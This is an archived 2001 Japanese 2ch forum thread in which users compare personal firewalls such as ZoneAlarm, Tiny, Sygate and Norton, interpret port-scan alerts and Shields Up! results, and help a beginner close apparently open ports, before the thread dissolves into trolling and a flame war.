 |   \    /|                 ヽ(´Д`)ノ  /    \      / .|
 |     \ //\               / (  )  \       \   /    |
 |      |/   \        /\ /    < ヽミ3 \     /| /      |
 |      \    /|   /\/    \      \    /|   /          |
 |        \ //\/    \     \     /|  /                 |
 |         |/   \     \    / | /                    |
 |         \     \   / | /                         .|
 |           \    /| /                              .|
 |            \ /                                  |
 |              .|                                   .|
               |
               |
               |
146143:2001/07/03(火) 01:02
>>144
フリーだし、日本語のパッチ当てられるし、設定が簡単だから。
147名無しさん@お腹いっぱい。:2001/07/03(火) 01:04
>>146

>>138-141は読んだの?
148143:2001/07/03(火) 01:29
>>147
読みました。
有名なTOOLなんですか?
私は知りませんでした。
ルーターも入れてるので安心しきってますが、やっぱ甘いですかね。
149名無しさん@お腹いっぱい。:2001/07/03(火) 01:33
ん、まあいいけどね。ルーターもあるようだし。
ぞぬは有名な分クラッカーに狙われやすいから
ってだけだから。セキュリティホールがいくつかみつかったり
するけど大したことないものばっかりだし。

でも重いからなぁ・・・まあ確かに初心者にはいいかもね
150143:2001/07/03(火) 01:46
>>149
サンキューです。
とりあえず、ゾヌを使い続けてみます。
151名無しさん@お腹いっぱい。:2001/07/03(火) 10:05
とあるバナーを読み込むときに必ずポート8787の接続要求を受けるんですが
これて何なんでしょう?遮断するとバナーが×になります。
152名無しさん@お腹いっぱい。:2001/07/03(火) 10:24
よくある話だよ。いわゆるWEBバグってやつ。
Javaアプレットでソケット使ってどっかのサーバーに
接続しようとするやつが多いけど、まあ大したこと
やってるわけじゃなく、広告表示の為のなんかやってるだけ。

ほかにもそんな感じでどっかに接続しようとするカウンター
とかも最近みかけるね。まあもちろん全部遮断しちゃって
問題なし。
153んーと:2001/07/03(火) 11:03
Windows2000SP2でZoneAlarm使っているんですけどZoneAlarmを
終了させると100%の確立でPCが再起動してしまいます。
解決方法わかる方いませんか?
他のソフトを使えというのは無しでお願いします。
(一通り試してみてZoneAlarmにしてるもんで・・・)
154143:2001/07/03(火) 12:50
>>153
うーん、なんだろうね。
家も全く同じ環境だけど、再起動はしないよ。
ゾヌのバージョンは2.6.88だけど。
155名無しさん@お腹いっぱい。:2001/07/03(火) 13:03
>>152
そうなんですか。カウンターはアクセス解析の情報取得に使われることが多いって聞いたので
proxyomitronで殺してたんですが同じようなものなのですか。全部遮断しておきます。
ありがとうございました。
156名無しさん@お腹いっぱい。:2001/07/03(火) 13:06
>>153
SystemError怒ると再起動する設定にしてるんでは?
アタックが来たら即座に知らせてくれるFWって
ぞねとノートンだけですか?
158名無しさん@お腹いっぱい。:2001/07/03(火) 18:10
????????????????????????????????
159名無しさん@お腹いっぱい。:2001/07/03(火) 18:12
>>157
????
160名無しさん:2001/07/03(火) 18:13
>>157
翼・・艢朽・楳÷凍÷vbe�ょ"・
161159:2001/07/03(火) 18:14
繝「繝ュ縺ォ縺九?カ縺」縺滂ス・?ス・?ス・?ス・
162名無しさん@お腹いっぱい。:2001/07/03(火) 18:30
何言?b?U楸殀慰旭旭ー!!!!!!!!日本悟ヂ喋レ智?ユ!!!!!!!!!!!!!!!!!!!!!!!!!!!
163、?:2001/07/03(火) 18:32
addr +0 +1 +2 +3 +4 +5 +6 +7 +8 +9 +A +B +C +D +E +F 0123456789ABCDEF
0000 82 C8 82 C9 82 A2 82 C1 82 C4 82 C1 82 A9 82 ED ................
0010 82 A9 82 F1 82 CB 00 .......
164153:2001/07/03(火) 19:19
>>156

おっしゃる通りの設定になっていました。
でもウチのZoneAlarmは終了するたびにエラー起こしてるってことですよね・・・・
165名無しさん@お腹いっぱい。:2001/07/03(火) 19:33
>>164
うちの場合、Outpost使っててやたらと再起動(何の前触れもなく)するから
おかしいな〜って考えてて、その設定に気付いた。
つい最近の事だったから(20日ほど前)、すぐ分かったわけです。

Zonealarmやめて、SygateかTinyにしたらどうですか?
16639:2001/07/03(火) 20:59
かなり前のトラブルの続きだけど、ICS環境でTinyでどうにか通信できるようになったよ。
「InternetGagewayで動作」みたいなチェック入れるのと、あとどっかいじってたら、
一応LAN内のマシンすべてで通信が出来る状態に。
信頼するネットワークとかかな?
まだ穴だらけだけどさ(w
ま、のんびり設定するさ。

あらためて付き合ってくれた人たちに感謝
167名無しさん@お腹いっぱい。:2001/07/03(火) 21:26
おっ、解決したのかい。おめでとう
168わりと初心者:2001/07/04(水) 00:07
ウイルスバスター2001のファイアーウォールやばいって本当?
自分はテレホで一時間くらいしかネットやらのにけっこういろんな
ところからアタックかけられるんだけど
これってもう破られてるからかな?
169 :2001/07/04(水) 00:11
>168
??何だろうな。
サーバー業務用のアレのことかな。。
というか、パーソナルな方にも穴有るのかな。
アタークされたとウォールのログに残ってるうちは大丈夫なんでないの??
170 :2001/07/04(水) 00:16
太文字だと見やすくて良いね。
171名無しさん@お腹いっぱい。:2001/07/04(水) 00:45
まさか業務用じゃないだろ(w
ウィルスバスターに穴があるっつーのは聞いたことないが、
確かに評判は最低だな。まあ堅さはどんなもんか知らんけど、
めちゃくちゃスループット下げるから評判悪くなったんじゃないのん?
172168:2001/07/04(水) 01:59
業務用のわけないでしょ、初心者なのに(笑
普通に店頭で売ってる奴、確か7000円くらいだった
店員が「ファイアーウォールソフトじゃこれが一番売れてますよ」って
言うから買ったのに評判は芳しく無いみたい
ほとんど話題にも乗らないありさま・・・何で評判悪いの?
常時接続に切り替える時にノートンに切り替えた方が言いと思う?
173名無しさん@お腹いっぱい。:2001/07/04(水) 02:09
>>172
なんでキミは金出して買う事しか考えないのかね?
OS以外はフリーで十分やってけると思うよ。
174名無しさん@お腹いっぱい。:2001/07/04(水) 02:10
>>173
頑張ればOSもフリーで逝けます。
175168:2001/07/04(水) 02:27
確かにウイルスバスターのパーソナルファイアーウォールよりも
評判がいいフリーソフトいっぱいあるよね
フリーソフトに乗り換えようかな・・・
しかしフリーソフトよりもはるかに評価が低いウイルスバスター2001って(藁
176名無しさん@お腹いっぱい。:2001/07/04(水) 02:31
>>175
全部です!!

と、これ以上責めても可哀想だし止めておくけど、TinyがSygateで良いんじゃないかな。
Sygateだったら細かい設定は全く必要要らないし、逆にTinyなら細かい設定も出来るし軽いし。
ぞぬみたいにアタックが来たらすぐにバルーンで知らせてくれる
FWってノートン以外でありませんか?
178名無しさん@お腹いっぱい。:2001/07/04(水) 08:57
>>177
Tinyもポップアップ出せたはずだけど?
179177:2001/07/04(水) 09:20
>>178
サンクス。
180名無しさん@お腹いっぱい。:2001/07/04(水) 09:53
出せないfwなんてあるのか?
つーか>>157-163ワラタ
>>180
出せないのは結構あるぞ。
182名無しさん@お腹いっぱい。:2001/07/04(水) 10:07
出せないってのはアタック毎のポップアップか?
パーソナルfwで?
それはしらなんだ、でも有名なのは大体出せると思うけどなぁ
183名無しさん@お腹いっぱい。:2001/07/04(水) 10:10
つーか本当にアラート出せないPFWあんのかなぁ・・・
あったとしても許可されてない全てのアクセスをaskにしておけば
必ずpopup出ると思うが・・・
184名無しさん@お腹いっぱい。:2001/07/04(水) 10:20
「一番売れてるものは一番よくないものだ」マカフィーの法則
185名無しさん@お腹いっぱい。:2001/07/04(水) 10:34
内から外へのアクセスは、ほとんどの全部のfwが
ポップアップだすだろうけど、ポートスキャンぐらいで
警告ポップアップだされるとうざい。
186名無しさん@お腹いっぱい。:2001/07/04(水) 10:41
どれでもon/offできるでしょ
それ以前に(インバウンドだろうと)ポップアップ出せないfwなんて
ほとんど無いと思うけど
187名無しさん@お腹いっぱい。:2001/07/04(水) 22:28
このスレを読みまして、ファイアーウォールを導入したところ、
早速、ブロックしてくれました。台湾からでした。
こういうことって、日常茶飯事に起こるものなんですか?
188名無しさん@お腹いっぱい。:2001/07/05(木) 00:04
>>187
攻撃じゃなくてさー水鉄砲の「流れ弾」程度をブロックしただけだってば
何度逝ったら分かるかなぁ〜

つーか、過去ログの書きこみにあったはずだが・・・
189名無しさん@お腹いっぱい。:2001/07/05(木) 01:20
Win板のfwスレで共有もデーモンも入れてないPCがハクられるわけねーfwいらねー
ゴミパケ弾く程度だとか言ってたけど実際どうなんだろう
190名無しさん@お腹いっぱい。:2001/07/05(木) 09:08
>>189
それもそいつの勝手だ。ほっとき
191名無しさん@お腹いっぱい。:2001/07/05(木) 10:00
>>189
相手するだけ無駄
192名無しさん@お腹いっぱい。:2001/07/06(金) 09:47
上げといたほうがいいな
193名無しさん@お腹いっぱい。:2001/07/06(金) 15:50
194ヽ(-_−)ノ:2001/07/09(月) 14:30
あの・・・ノートンのデフォルトの規則なんですけど

Default Inbound Loopback
Default Outbound Loopback

これって、何でもOKに見えちゃうんですが。
制限してるのはローカルアドレスがlocalhost
っていうだけですよね。任意のリモートからの、
任意のサービスを、TCP/UDP問わず、InもOutも
許可しちゃうことになっちゃいそうに読めるん
ですが。でも、それにしては、何回か他の規則
による警告が出たことがあるんで、一応防御は
してくれてるはずなんですよね・・・。
でも、一体どうしてそうやってうまくいくのか
わからない・・・。
195ぞね :2001/07/10(火) 13:21
Korea Network Information Center
わーい、カンコックから信号がはじめてきたさ。
196 :2001/07/10(火) 16:43
踏み台にされかけたことが一度だけあったが。
197ヽ(-_−)ノ:2001/07/10(火) 16:52
>196
どうやって気づいたの?
198名無しさん@お腹いっぱい。:2001/07/10(火) 17:00
http://www.inside-security.de/advisories/fw1_rdp.html
http://www.cert.org/advisories/CA-2001-17.html
これってヤバいのか?
259/UDP が通ってもあんまりうれしくないような。
199はも:2001/07/10(火) 20:49
211.197.247.174ってどこか知ってます?
200名無しさん@お腹いっぱい。:2001/07/10(火) 21:17
>>199
知らない。
でも調べればわかる。
http://www.mse.co.jp/ip_domain/
201名無しさん@お腹いっぱい。:2001/07/11(水) 06:20
ここ一ヶ月というもの毎日同じ人物から(カンコック)トロイが送られてきます。
のーとんのインターネットセキュリティ2001を入れたんですが
USB接続なので不安です…(;´Д`)
他にも何かセキュリティソフトを入れた方がいいんでしょうか?
202名無しさん@お腹いっぱい。:2001/07/11(水) 06:25
トロイじゃなくてトロイが仕掛けられてないかどうかのポートスキャンだろ
大体fw複数入れちゃダメ
203名無しさん@お腹いっぱい。:2001/07/11(水) 06:28
>>202
複数はまずいのですね…ありがとうございます。
204名無しさん@お腹いっぱい。:2001/07/11(水) 06:58
>>203
カンコックに心からの謝罪を求めるニダ!!!
205名無しさん@お腹いっぱい。:2001/07/11(水) 06:58
農豚だと「規則:〜〜〜(トロイの名前)でブロックしました」とか何とか出るんだろうが
これは全部ただのポートスキャン。これ食らった時にトロイが常駐してれば
トロイと通信されるってだけ。PCで直接トロイ送られるなんてほとんど無いよ。
206名無しさん@お腹いっぱい。:2001/07/11(水) 07:13
ほんとに「トロイが送られてきた」って言う人多いね。
この板で同じ事言う人3,4人見たよ。
207名無しさん@お腹いっぱい。:2001/07/11(水) 07:35
>>206
同一人物
208201=203:2001/07/11(水) 08:49
>>205
てっきり送られてくるものだとばかり思ってました。(恥)
でも毎日同じ相手をポートスキャンする意義がわかりません…
209名無しさん@お腹いっぱい。:2001/07/11(水) 15:23
ただの無差別ポートスキャンでしょ
fwがブロックしてるんだから問題無し
210名無しさん@お腹いっぱい。:2001/07/11(水) 15:46
>>201
ここに書いてある対策をこうじれば万全です!
ttp://members.tripod.co.jp/casinoA1/
211名無しさん@お腹いっぱい。:2001/07/11(水) 15:49
ブラクラでもない関係ないURL貼って何したいんだこの知恵遅れは
212名無しさん@お腹いっぱい。:2001/07/11(水) 16:19
カジノとかURLにあるから宣伝だろ
213na:2001/07/11(水) 17:56
210.236.190.32 こいつが何度もくる
214名無しさん@お腹いっぱい。:2001/07/11(水) 18:00
>>213
それがどうした。
俺なんか借金取りが毎日やってくるぞ。
215名無しさん@お腹いっぱい。:2001/07/11(水) 19:34
うちは来ないな。電話も来ない。メールも。あ、MLとMMは来るか。
それ以外は来ないな。SPAMも無いな。なんとか99とか、
灰振りすとか、ウィルス情報もまめにチェックしてるけど
そういうのも一回も来ないからあまり意味ないな。
216名無しさん@お腹いっぱい。:2001/07/12(木) 06:19
ぞね入れててこないだっからADSLになったんだけど
そのとたんいっこもping飛んでこないんだけどなんで???
ルーター使ってて98SEなんだけど。
217名無しさん@お腹いっぱい。:2001/07/13(金) 04:19
最近FW(Tiny)入れたんですが、
ISPへの接続直後にUDPのIN/OUT(port:137)をISP宛てにしてます。
200byte程度のデータみたいなんですが、これって何なんでしょうか?
送受信は接続直後だけで、askに対してdenyした場合とpermitした場合
で後の動作に変わりはありません。
218名無しさん@お腹いっぱい。:2001/07/13(金) 21:43
>>212
ちがうみたいよ。
カジノはURLだけで、内容は純粋な
セキュリティ関係の解説サイトだよ。
ちょっと見てみなよ。
219名無しさん@お腹いっぱい。:2001/07/13(金) 22:21
>>216
うちはADSLにした途端ZONEには、ばしばしping来てtinyは全く来ないんだが・・・・
220名無しさん@お腹いっぱい。:2001/07/13(金) 22:50
>>218
だれか釣れるとでも思ったか?知恵遅れ
221名無しさん@お腹いっぱい。:2001/07/13(金) 22:51
>>220
ルールの設定してないに10ペソ
222名無しさん@お腹いっぱい。:2001/07/14(土) 11:45
221は>>219宛てだった
223名無しさん@お腹いっぱい。:2001/07/14(土) 17:22
>>210
>ここに書いてある対策をこうじれば万全です!
ttp://members.tripod.co.jp/casinoA1/

小遣い稼ぎの書き込みは止めましょう。
ひどいことになっても知らないよ。
224名無しさん@お腹いっぱい。:2001/07/14(土) 23:59
質問させてください。
ADSL導入前にセキュリティについて調べようと
Shields Up!でポートプローブを行うと
いくつかのポートがOPENと表示されてしまいました。
Zon Alarmを導入してみたのですが同じポートがOPENと表示されていました。
そもそもここで表示されるポートはすべてClosedもしくはStealthが当然なのでしょうか?
Closeedになるにはどのような設定が必要なのでしょうか?
よろしくお願いいたします。
225名無しさん@お腹いっぱい。:2001/07/15(日) 00:06
fw入れれば(少なくともShields up!でチェックされる程度のポートは)全部Stealthが普通です。
Openは問題外です。玄関が開きっぱなしの状態です。
ハード的な問題が何かあると思いますけど。どっちにしても
情報が無さ過ぎるので何とも言えないです。
226224:2001/07/15(日) 00:24
225さん、どうもありがとうございますm(__)m
少しショックな状況ですが・・・。玄関開きっぱなしなんですね。
どのような情報があれば、ある程度わかりますか?
開いてるポートここに書いちゃったら危ないですよね?
227名無しさん@お腹いっぱい。:2001/07/15(日) 00:38
簡単に言うと
Open・・・玄関が開きっぱなし
Closed・・・侵入者からは見えるが鍵はしまっている
Stealth・・・玄関自体隠されていて外から見えない状態
かな。情報は、プロバとかOSとか、あと空いてるポート。
IP出さなければ空いてるポート言っても何も出来んよ。
んで、Shields up!でテスト中は他に何かデータの送受信してなかったの?
それとぞねの設定はいじってない?
228名無しさん@お腹いっぱい。:2001/07/15(日) 00:39
OSは聞いてもどうしようもないか・・・ってか窓だろーな・・・
229名無しさん@お腹いっぱい。:2001/07/15(日) 00:40
あ、ちなみにLANとかだったらパス。
230224:2001/07/15(日) 00:59
度々ありがとうございます。
Win98でプロバは3Webです。ISDNで接続しています。
開いているポートはFTP、telnet、SMTP、IDENTの4つです。
その他のポートは全てStealthになっています。
テスト中はデータの送受信はしていません。
Zon Alarmの設定は・・・セキュリティ→インターネット高です。
LANは組んでいません。

本当にご親切にありがとうございますm(__)m
231名無しさん@お腹いっぱい。:2001/07/15(日) 01:04
プロバイダの鯖のポートチェックしてると思われ
232名無しさん@お腹いっぱい。:2001/07/15(日) 01:10
よくわからんので調べてるんだけどとりあえずウィルスチェックしてみたらどう?
トロイがポートあけてんのかも知れんし。
233名無しさん@お腹いっぱい。:2001/07/15(日) 01:14
串刺さってないか?でもShieldsUp!だしなぁ・・・
234名無しさん@お腹いっぱい。:2001/07/15(日) 01:17
確かに串鯖ポートスキャンする輩はいる(藁 が
Shields up!は無いね
235名無しさん@お腹いっぱい。:2001/07/15(日) 01:18
まあな、ShiledsUp!はHTTPS使って生IPでスキャンするはず
だから、串ってのも考えにくいんだけど、

FTP,telnet,SMTP,IDENTなんていかにも鯖じゃん
236244:2001/07/15(日) 01:19
一応ウイルスバスターのonlineチェックもしてみたのですが
何もひっかからないんですよね。
トロイの事もよく分からないので、そうかなぁと警戒してしらべたのですが。
Zon Alarmを導入しても警告が鳴ったこともありません。

調べていただいてスミマセン。
自分でも昨日からいろいろ検索してみたんですが「不要なポートは閉じろ!」って
事はわかったけれども、その閉じ方となるとなかなか見つからないので・・・。
237名無しさん@お腹いっぱい。:2001/07/15(日) 01:21
http://scan.sygatetech.com/

ここのQuickScanっての試してみ。もちろん串は外して。
238名無しさん@お腹いっぱい。:2001/07/15(日) 01:25
239名無しさん@お腹いっぱい。:2001/07/15(日) 01:27
>>238
今ここにいる初心者をからかう為にやってるのか?
どっちにしろここはJ-COMのスレだ。くだらんものを貼るな
240名無しさん@お腹いっぱい。:2001/07/15(日) 01:31
>>237って最高stealth?
おれ全部blockedなんだけど(藁
Sygateなのに
241244:2001/07/15(日) 01:33
Zon Alarmは起動したままで平気ですか?>QuickScan
242名無しさん@お腹いっぱい。:2001/07/15(日) 01:33
おっと、かちゅ〜しゃ使ってたらJ-COMスレと間違えた。

>>240
BlockedでOK。

確か
Blocked>Closed>Open
243名無しさん@お腹いっぱい。:2001/07/15(日) 01:33
>>241
当然
244名無しさん@お腹いっぱい。:2001/07/15(日) 01:34
>>241
もちろん。っつーか起動しないでポートスキャン
しても意味無いじゃん(w
245名無しさん@お腹いっぱい。:2001/07/15(日) 01:34
>>242
なるほど了解。ちょっとビビった
246244:2001/07/15(日) 01:38
あっ、そうか!ごめんなさい〜。
今やっています!!
247名無しさん@お腹いっぱい。:2001/07/15(日) 01:42
結果出てないのにステータスバーに「ページが表示されました」ってなって
うんともすんとも言わなくなったらページの更新しなよ
248名無しさん@お腹いっぱい。:2001/07/15(日) 01:42
244は俺だが・・・まあいいや(w
249224:2001/07/15(日) 01:43
ごめんなさい。ずっと名前が“244”になってました。
今QuickScanやっていますが、ずっと画面真っ白だけど大丈夫なんですかね?
40分くらいかかるんですか??
250名無しさん@お腹いっぱい。:2001/07/15(日) 01:45
だいたい一分以内に終わるけど
251名無しさん@お腹いっぱい。:2001/07/15(日) 01:45
40秒の間違いかと思われ(藁
252:2001/07/15(日) 01:45
>>240
オマエ、80もblockedなんか?
うそくせ〜
253224:2001/07/15(日) 01:46
大丈夫!うんともすんとも言わないけれど、表示されましたになってません。
続行中ですっ!!
254名無しさん@お腹いっぱい。:2001/07/15(日) 01:46
更新しれ
俺も2回何もでないで止まったよ
255名無しさん@お腹いっぱい。:2001/07/15(日) 01:46
>>252
全部Blockedが当たりまえ
256名無しさん@お腹いっぱい。:2001/07/15(日) 01:46
>>252
ヴァカ?
257:2001/07/15(日) 01:47
>>242
Port80 のブロックのやり方教えろ
258224:2001/07/15(日) 01:49
終わりましたが、全部Blockedですね。
259名無しさん@お腹いっぱい。:2001/07/15(日) 01:50
恋のから騒ぎ
260名無しさん@お腹いっぱい。:2001/07/15(日) 01:51
Shields upが何らかの理由で誤認に50ペソ
261名無しさん@お腹いっぱい。:2001/07/15(日) 01:52
もう一回Shields up逝きかなこりゃ・・
262名無しさん@お腹いっぱい。:2001/07/15(日) 01:56
>>261
チェック中に自分のIPでるでしょ?
ちゃんと生IPかどうか確認するようにね。
263244:2001/07/15(日) 01:56
もう一回いった方がいいですか?>Shields up
これやってるときってICQとかメール送信とか止めたほうがいいですか?
264名無しさん@お腹いっぱい。:2001/07/15(日) 01:57
>>263
行ってみた方がいいかもね。このままだと気持ち悪いだろうし。
ちゃんと生IPかどうか確認すること。

あと、サーバー型のアプリを使わなければ別に問題無いよ。
よくわからなければ全部止めときなさい。
265名無しさん@お腹いっぱい。:2001/07/15(日) 02:01
にしてもたとえばメール送受信程度でSMTPがOpenになったりするものか?
266名無しさん@お腹いっぱい。:2001/07/15(日) 02:02
ああ、良く読んでなかった
267名無しさん@お腹いっぱい。:2001/07/15(日) 02:04
>>265 サーバー?
268224:2001/07/15(日) 02:05
また↑で“244”ってやっちゃいましたが^_^;

Shields up 終了しました!
なんと全てStealthです。
なぜだろ・・・。

サーバー型アプリってのはどういうものを言いますか?
メールが来たかどうか調べるソフト、PCの時間を合わせるソフトなんかも
このサーバー型アプリにあてはなるのでしょうか?
269265=266:2001/07/15(日) 02:08
失礼。
270名無しさん@お腹いっぱい。:2001/07/15(日) 02:08
>>268
メーラー、ブラウザとかは完全にクライアント
メールが来たかどうか調べるソフトも、定期的にPOPサーバーに
リクエスト送ってるだけだから関係無し。

時間合わせは、NTP、SNTPのどっちを使ってるかによる。
ICQは使った事無いから知らん。
271224:2001/07/15(日) 02:13
とりあえず前と調べるときの環境の違いは
時間合わせのソフトとメール調べのソフトを常駐終了させたくらいなんですよね。
時間調べは桜時計といううのを使っていました。

これを使っていてOPENになるのだとしたら
あまりよくないって事ですか?
特に問題なしなのかな?

とりあえずStealthになったのでホッとしているのですが。
272名無しさん@お腹いっぱい。:2001/07/15(日) 02:19
>>271
別にその二つは関係無いよ。ShiledsUp!がなんか勘違いして
プロバイダの鯖をスキャンしたんじゃないかね
273224:2001/07/15(日) 02:23
なるほど。
そういう事もあるのですね>勘違い

とりあえずStealth万歳です。
皆様、長々とお付き合い頂いてありがとうございました。
何人いらっしゃるのかわからないけど、感謝感激です。
これからも自分で頑張って勉強していこうと思いました。
たくさん教えてチャンですみませんでしたm(__)m
274名無しさん@お腹いっぱい。:2001/07/15(日) 02:24
しかしZone導入前と後でOpenが確認されたんだから
再現性のある問題な気もするなぁ・・・
まぁたびたびチェックしてれば(もし問題あるとすれば)
問題のあるアプリとか特定できると思うが
275もう一丁:2001/07/15(日) 02:26
276224:2001/07/15(日) 02:29
そうですね。
度々チェックしてみます。
ちなみに今は時計合わせ、メールチェックソフト起動状態でも
全てStealthになりました。
昨日から何時間もやっていたのがウソのようです・・・
277じゃあもう一丁:2001/07/15(日) 02:29
http://www.sdesign.com:8080/cgi-bin/fwtest.cgi

当然串は外して行くこと。まあまた変な結果がでたら、
いろんなサイトのポートスキャンでチェックしてみなさい
278名無しさん@お腹いっぱい。:2001/07/15(日) 02:30
まぁ暇な時にいろんなセキュチェック試してみれ>>276
279224:2001/07/15(日) 02:31
もう一丁どうもありがとうございます!
これからやってみますー
280名無しさん@お腹いっぱい。:2001/07/15(日) 02:36
タフだな(w
281名無しさん@お腹いっぱい。:2001/07/15(日) 06:54
> We still recommend running this test both with and without Secure Desktop enabled...
> so turn it off and try the test again.

すいません、これってどういう意味ですか?
何をしてからもう一回やれと?
282 :2001/07/17(火) 20:04
>>281
”FWが動作してる状態と切ってある状態の両方でテストする事をオススメします”
って感じか?

何で切ってある状態でテストする必要があるんだろ?
283名無しさん@お腹いっぱい。:2001/07/17(火) 21:21
なんかしつこくアタックされるから何かと思ったら
WinMX切ってるのに6699を何十回と叩いてきてる奴が
結構居るようだ。
284名無しさん@お腹いっぱい。:2001/07/17(火) 21:23
2001-07-16 15:27:19 GMT
By 24.78.70.222 (柴崎雄志 )
Attack #2003502: UDP port probe
Port information: port=6257&reason=Firewalled
Attack count: 31
Attack result: Blocked
Attacker's DNS Name: h24-78-70-222.vc.shawcable.net
Attacker's NETBios Name: 柴崎 雄志 
Attacker's MAC Address: 002078103F47
Attacker's Machine Name: 柴崎雄志
Attacker's Group: 無し
285名無しさん@お腹いっぱい。:2001/07/17(火) 21:25
>>283
・・・・どこがアタックだ。当たり前
286名無しさん@お腹いっぱい。:2001/07/17(火) 21:35
そう言うのもアタックって言うんだよ
287名無しさん@お腹いっぱい。:2001/07/17(火) 21:38
ネタ?
288名無しさん@お腹いっぱい。:2001/07/17(火) 21:40
WinMX初心者
289名無しさん@お腹いっぱい。:2001/07/17(火) 21:44
pingを連打するアタックだな
290名無しさん@お腹いっぱい。:2001/07/17(火) 21:45
パソコン自体初心者だろ
291名無しさん@お腹いっぱい。:2001/07/17(火) 21:45
それもそうだ
292名無しさん@お腹いっぱい。:2001/07/17(火) 21:46
>>290=>>291
パソコン初心者(藁
293名無しさん@お腹いっぱい。:2001/07/17(火) 21:48
そんなつまらん自演してどうすんだか知らんが、
とりあえず参ったって言っとくよ。ごめんね上級者
294名無しさん@お腹いっぱい。:2001/07/17(火) 21:49
MXきった直後に6699を叩かれるのをアタックって言ってる奴に初心者って言われてもねぇ・・・
295名無しさん@お腹いっぱい。:2001/07/17(火) 21:49
「パソコン」ってのを持ち出すあたり
いかにも夏厨だな…
296名無しさん@お腹いっぱい。:2001/07/17(火) 21:50
イコール厨房がウザイから強制ID制導入してくれんかなぁ
297名無しさん@お腹いっぱい。:2001/07/17(火) 21:50
マァマァ みんなで降参しとこうや
298名無しさん@お腹いっぱい。:2001/07/17(火) 21:50
アタックだなんて何処にも書いてないし…
ばか?
299名無しさん@お腹いっぱい。:2001/07/17(火) 21:51
>なんかしつこくアタックされるから何かと思ったら

ばか?
300名無しさん@お腹いっぱい。:2001/07/17(火) 21:51
>>283はZoneAlarmとWinMXを颯爽と使いこなす
超エキスパートってことで
301名無しさん@お腹いっぱい。:2001/07/17(火) 21:51
何でこんなに必死に絡んでくるのか分からんな
夏厨の嫉妬か?
302名無しさん@お腹いっぱい。:2001/07/17(火) 21:52
夏休み入ったのかなぁ
303名無しさん@お腹いっぱい。:2001/07/17(火) 21:52
ププ
Zonealarmじゃないのに
夏休みだなぁ
304名無しさん@お腹いっぱい。:2001/07/17(火) 21:52
やばい、平静を装う夏厨が面白くなってきた(w
305名無しさん@お腹いっぱい。:2001/07/17(火) 21:53
じゃあ農豚だろうか(藁
306名無しさん@お腹いっぱい。:2001/07/17(火) 21:53
>>299
それがアタックだとは何処にも書いてないのに
ばか?
307名無しさん@お腹いっぱい。:2001/07/17(火) 21:54
201みたいな奴と同類って事だろ?
308名無しさん@お腹いっぱい。:2001/07/17(火) 21:54
農豚は別にいいか
どこぞのアンチウィルスの簡易fwか
309名無しさん@お腹いっぱい。:2001/07/17(火) 21:54
>>304
sageの奴は文章も読めなけりゃスキルも無い
夏厨ばっかしだね
310名無しさん@お腹いっぱい。:2001/07/17(火) 21:55
どうやらFWもまともに使えない夏厨が
嫉妬している模様
311名無しさん@お腹いっぱい。:2001/07/17(火) 21:55
自分を晒しageしてらっしゃるお方にそのような事を言われましても(藁
312名無しさん@お腹いっぱい。:2001/07/17(火) 21:56
夏休みの友早めに済ませとけよ
313名無しさん@お腹いっぱい。:2001/07/17(火) 21:56
>>308
全部大ハズレ
夏厨確定!
314名無しさん@お腹いっぱい。:2001/07/17(火) 21:57
>>311の真性夏厨を晒し上げ(ワラ
315名無しさん@お腹いっぱい。:2001/07/17(火) 21:58
>上級者を除くみなさん

学生の夏休みが始まったら
この板には来ないほうがよさそうですね。
316名無しさん@お腹いっぱい。:2001/07/17(火) 22:00
つーかまだ早いんでないの
317名無しさん@お腹いっぱい。:2001/07/17(火) 22:00
うーん、でも上のログを見ればどのファイアウォールソフト
使ってるか分かる人にはすぐ分かると思うけど、
夏厨の書いてるのは全部適当で大ハズレなんだよね。
しかも「パソコン初心者」とかいかにも何も知らなさそうな
自爆書き込みが…
318名無しさん@お腹いっぱい。:2001/07/17(火) 22:00

           ___
    .      |(・∀・)|
     .      | ̄ ̄ ̄   ジサクジエン共和国
         △
        △l |
   __△|_.田 |△_____
      |__|__門_|__|_____|_____
319名無しさん@お腹いっぱい。:2001/07/17(火) 22:01
まぁまだ厨房でも起きてるか
320名無しさん@お腹いっぱい。:2001/07/17(火) 22:01
学生なんて年中休みみたいなもんなのに
中卒には理解不能かな?
321名無しさん@お腹いっぱい。:2001/07/17(火) 22:02
厨房は放置と言うことで
322名無しさん@お腹いっぱい。:2001/07/17(火) 22:02
もうちょっと続けてくれ(w
323名無しさん@お腹いっぱい。:2001/07/17(火) 22:02
>>322
もう腹いっぱいだ。ヤメレ
324名無しさん@お腹いっぱい。:2001/07/17(火) 22:02
馬鹿ばっかし
325名無しさん@お腹いっぱい。:2001/07/17(火) 22:03
>>317
どのログ?
326この厨房が孤軍奮闘中:2001/07/17(火) 22:04
285 名前:名無しさん@お腹いっぱい。 投稿日:2001/07/17(火) 21:25
>>283
・・・・どこがアタックだ。当たり前
327名無しさん@お腹いっぱい。:2001/07/17(火) 22:05
わかったから。285の自作自演だね。わかったからもう寝れ。いい加減しつこいよ。
328名無しさん@お腹いっぱい。:2001/07/17(火) 22:05
やだ
ねないもーん
夜はこれからよ
ウフ
329名無しさん@お腹いっぱい。:2001/07/17(火) 22:06
何でこれくらいのことでこんなに荒れるんだ?
330名無しさん@お腹いっぱい。:2001/07/17(火) 22:07
ほっときゃいいのに何でこんなに必死に絡むの?
331名無しさん@お腹いっぱい。:2001/07/17(火) 22:08
わかった。言いたいことはわかったからageないでくれ
332名無しさん@お腹いっぱい。:2001/07/17(火) 22:08
>>331
あんたも構うな
333名無しさん@お腹いっぱい。:2001/07/17(火) 22:09
WinMXって切ってからも個人PC向けにパケット飛んでくるんだな
334名無しさん@お腹いっぱい。:2001/07/17(火) 22:11
なんで上げたらイカンのか不明
335名無しさん:2001/07/17(火) 22:12
無意味だから。
336名無しさん@お腹いっぱい。:2001/07/17(火) 22:12
   ___        __/
  /    /\     / _/\      ___
/ ̄ ̄ ̄\/|   /| ̄ .\/|    /    /\
       |  |   |/\__.|/  /| ̄ ̄ ̄\/|       _      __       __
  / ̄ ̄~|/|   \/_/    | |____|/    / ̄ ̄/|  / ̄ /_   / ̄/  /|
./| ̄ ̄ ̄.|  |.      ̄/__    |/     /   /__/  | / _/~~/| ∠_/フ / .|
|  |     |  |   /フ ̄/\   | ̄| ̄ ̄ ̄     ̄  /|  / / ̄  //  /  /  |  /
|/\   .|  |  /| ̄ ̄ ̄\/|  |/\          |_|/   ̄ ̄ ̄|/    ̄ ̄  __|/
\/ ̄ ̄~|/|  |/\    ___|/  \  \   __    |/       /     / ̄ ̄/
